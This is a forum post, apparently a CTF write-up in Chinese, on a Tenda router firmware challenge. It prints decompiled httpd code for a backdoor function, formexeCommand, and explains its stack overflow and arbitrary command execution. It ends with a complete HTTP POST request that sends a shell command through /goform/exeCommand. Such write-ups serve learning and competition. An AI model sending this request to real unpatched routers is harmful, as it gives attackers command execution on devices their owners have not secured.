-
-
[原创]绿城杯-创新题目Route-Stack解法(tenda 路由器漏洞挖掘)
-
发表于: 2021-9-30 14:52 11825
-
固件分析
这道题比较简单,题目给的是一个tenda路由器的,且固件比较老,型号是V15.03.05.16_CN,直接到官网下载固件,解包分析。
由于之前挖的tenda路由器的洞都在httpd上,所以先审httpd的代码,路由都在下图这个函数里,直接审计代码就行
不难发现多个函数都有漏洞,而且固件还有一个可疑后门,即formexeCommand函数可以执行任意命令(庆幸的是新版固件已去除该函数)
该函数有两个问题:栈溢出、shell命令执行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 | int __fastcall formexeCommand( int a1) { size_t v1; / / r0 char v4[ 4096 ]; / / [sp + 10h ] [bp - 231Ch ] BYREF char v5[ 4096 ]; / / [sp + 1010h ] [bp - 131Ch ] BYREF char s1[ 256 ]; / / [sp + 2010h ] [bp - 31Ch ] BYREF char s[ 512 ]; / / [sp + 2110h ] [bp - 21Ch ] BYREF size_t n; / / [sp + 2310h ] [bp - 1Ch ] FILE * stream; / / [sp + 2314h ] [bp - 18h ] char * src; / / [sp + 2318h ] [bp - 14h ] int v11; / / [sp + 231Ch ] [bp - 10h ] memset(s, 0 , sizeof(s)); memset(s1, 0 , sizeof(s1)); memset(v5, 0 , sizeof(v5)); memset(v4, 0 , sizeof(v4)); v11 = 0 ; src = (char * )sub_2B7C4(a1, "cmdinput" , &unk_E27E0); strcpy(s, src); sub_7B098(s1, s); if ( !strcmp(s1, "cd" ) ) { v1 = strlen(path_buf); sub_7B178(path_buf, s, v1); doSystemCmd( "echo %s > /tmp/cmdTmp.txt" , path_buf); } else if ( !strcmp(s1, "ls" ) || !strcmp(s1, "cat" ) ) { sub_7ADC4(s); doSystemCmd( "%s > /tmp/cmdTmp.txt" , s); } else if ( !strcmp(s1, "echo" ) ) { sub_7AAEC(s); doSystemCmd( "%s" , s); } else if ( !strcmp(s1, "pwd" ) ) { doSystemCmd( "echo %s > /tmp/cmdTmp.txt" , path_buf); } else if ( !strcmp(s1, "ping" ) ) { doSystemCmd( "%s -c 3 > /tmp/cmdTmp.txt" , s); } else { doSystemCmd( "%s > /tmp/cmdTmp.txt" , s); } stream = fopen( "/tmp/cmdTmp.txt" , "r" ); if ( !stream ) return puts( "formexeCommand:open file error!" ); while ( 1 ) { memset(v4, 0 , sizeof(v4)); if ( !fgets(v4, 4096 , stream) ) break ; n = strlen(v4); if ( v11 + n + 1 > 0x1000 ) break ; memcpy(&v5[v11], v4, n); v11 + = n; } fclose(stream); sub_2C144(a1, "%s" , v5); return sub_2C68C(a1, 200 ); } |
漏洞利用
直接利用firefox发包执行shell命令找到flag的位置,然后cat出来即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | POST / goform / exeCommand HTTP / 1.1 Host: 1.13 . 168.92 User - Agent: Mozilla / 5.0 (Windows NT 10.0 ; Win64; x64; rv: 91.0 ) Gecko / 20100101 Firefox / 91.0 Accept: * / * Accept - Language: zh - CN,zh;q = 0.8 ,zh - TW;q = 0.7 ,zh - HK;q = 0.5 ,en - US;q = 0.3 ,en;q = 0.2 Accept - Encoding: gzip, deflate Referer: http: / / 1.13 . 168.92 / mac_filter.html?random = 0.8789105901190445 & Content - Type : application / x - www - form - urlencoded; charset = UTF - 8 X - Requested - With: XMLHttpRequest Content - Length: 27 Origin: http: / / 1.13 . 168.92 Connection: keep - alive Pragma: no - cache Cache - Control: no - cache cmdinput = cat / home / flag.txt |
赞赏
他的文章
看原图
赞赏
雪币:
留言: